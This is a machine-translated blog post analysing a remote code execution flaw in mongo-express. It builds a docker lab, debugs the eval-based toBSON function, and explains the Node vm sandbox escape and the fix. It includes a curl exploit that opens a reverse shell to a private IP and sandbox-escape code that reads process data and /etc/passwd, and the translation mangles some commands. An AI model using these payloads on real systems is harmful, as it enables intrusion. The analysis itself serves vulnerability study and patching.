Shulou(Shulou.com)05/31 Report--

Today I will introduce to you an example analysis of remote code execution vulnerabilities. The content of the article is good. Now I would like to share it with you. Friends who feel in need can understand it. I hope it will be helpful to you. Let's read it along with the editor's ideas.

0x01 knows mongo-express.

Mongo-express is an Admin Web management interface for MongoDB, written in NodeJS, Express, and Bootstrap3. Mongo-express should be the MongoDB admin management interface with the largest number of Star on Github. Easy to deploy and easy to use, it has become the choice for many people to manage mongo.

Construction of 0x02 debugging environment

0x1 starts the docker service

Reading the official GitHub security bulletin, we found that the vulnerability affected all versions below 0.54.0. Choose 0.49 as an example to test. Since the MongoDB database is also required for this vulnerability environment, we can quickly build it by executing the following docker command:

Set up MongoDB database

Docker run-- name test-d mongo:3.2

Build the mongo-express containing the vulnerability and connect to the MongoDB database above:

Docker run-d-p 8081-link test:mongo mongo-express:0.49

Check the log to confirm that the connection is successful.

0x2 enables nodejs debugging option

Here's a trick. If you want to debug nodejs, you need to add the-- inspect parameter at startup. Make the following changes in the docker startup script

Docker restart 183

Use docker exec-it 183 bash to connect to docker to check whether the debug service is enabled

Just open port 9229 as shown in the figure above. As long as the external host can connect and access port 9229, you can use the chrome plug-in to debug, you can use frp to forward the port, or you can use the docker-p 9229 docker 9229 parameter to do processing.

0x3 Chrome DevTools

Using the chrome plug-in, you can debug nodejs just like a javascript script, and it is also very convenient to operate.

First download the debug plug-in

Open about:inspect chrome devtools in chrome and support Nodejs debugging since May 2016. click Open dedicated DevTools for Node

Configure connection address and port

And then it's like debugging js.

Send a test package, the routing branch can be cut off, and then start debugging this vulnerability.

Curl http://127.0.0.1:8081/checkValid-d 'document=this.constructor.constructor ("return process") (). MainModule.require ("child_process"). ExecSync ("bash-I > & / dev/tcp/192.168.43.176/8003 0 > & 12 > & 1")'

Debugging and principle Analysis of 0x03 loopholes

The principle of the vulnerability in this debugging is relatively simple, and the core vulnerability is command splicing, which is the simplest form of vulnerability, but it takes some effort to use it, because you need to bypass the sandbox VM. Fortunately, there is a research basis for vm bypass of nodejs. Don't say too much, just look at the final vulnerability code.

String is the parameter of toBSON, BSON is a common data format in MongoDB, and JSON is a close relative, but there are many differences with JSON's data format, but all operations related to BSON in mongo-express, such as creating a new document (similar to the insert operation of other databases) need to go through the toBSON () function.

For example, the following

The eval function will be triggered when the code flow reaches bson.toBSON, because nodejs can be used as a back-end language, so the eval function runs on the server side, which can cause command injection and harm the system.

Exp.checkValid = function (req, res) {var doc = req.body.document;try {bson.toBSON (doc);} catch (err) {console.error (err); return res.send ('Invalid');} res.send (' Valid');}

Exports.toBSON = function (string) {var sandbox = exports.getSandbox (); string = string.replace (/ ISODate\ (/ g, 'new ISODate ('); string = string.replace ("[^] +"), / g, 'Binary (new Buffer ($1, "base64"),'); vm.runInNewContext ('doc = eval ((' + string +'));', sandbox); return sandbox.doc;}

From the code traceability analysis, the parameter string of toBSON is the document in req.body, so this part can be controlled. You can find the vm.runInNewContext function, which is a virtual sandbox. So the next section examines how to bypass sandbox protection.

0x04 nodejs sandbox bypass

A sandbox is a separate environment that securely executes untrusted code without affecting the actual external code. Code execution is often limited in a sandbox. The VM module provides API for compiling and running code in the context of a VM virtual machine. The VM module allows you to run code in a sandboxed environment. The running code uses a different V8 context, that is, its global variables are different from other code. But the code in the sandbox can still access the Node process. We often use this method to bypass.

0x1 phenomenon

Vm.js

"use strict"; const vm = require ("vm"); const xyz = vm.runInNewContext (`this.constructor.constructor ('return this.process.env') () `); console.log (xyz)

You can see that this.process.env got the information about the nodejs process, which means that you can go back to the main program to execute the system command.

0x2 interpretation

In javascript, this points to the object to which it belongs, so when we use it, we already point to an object outside the context of VM. Then the .constructor of this returns Object Constructor, and the .constructor of Object Constructor returns Function constructor. Function constructor is like the highest function in javascript. It allows global access. Function constructor allows you to generate functions from strings to execute arbitrary code. So we can use it to return to the main process. We can then use it to access the main process and then RCE.

"use strict"; const vm = require ("vm"); const xyz = vm.runInNewContext (`const process = this.constructor.constructor ('return this.process') (); process.mainModule.require (' child_process'). ExecSync ('cat / etc/passwd'). ToString () `); console.log (xyz)

By the same token, the vm2 function can also be bypassed, so let's learn https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html by referring to the original text.

0x05 vulnerability patching

Here are two diagrams to illustrate everything. Use mongo-query-parser to parse BSON data and replace it directly from the source.

The above is the whole content of remote code execution vulnerability example analysis, more content related to remote code execution vulnerability example analysis can search the previous article or browse the following article to learn ha! I believe the editor will add more knowledge to you. I hope you can support it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.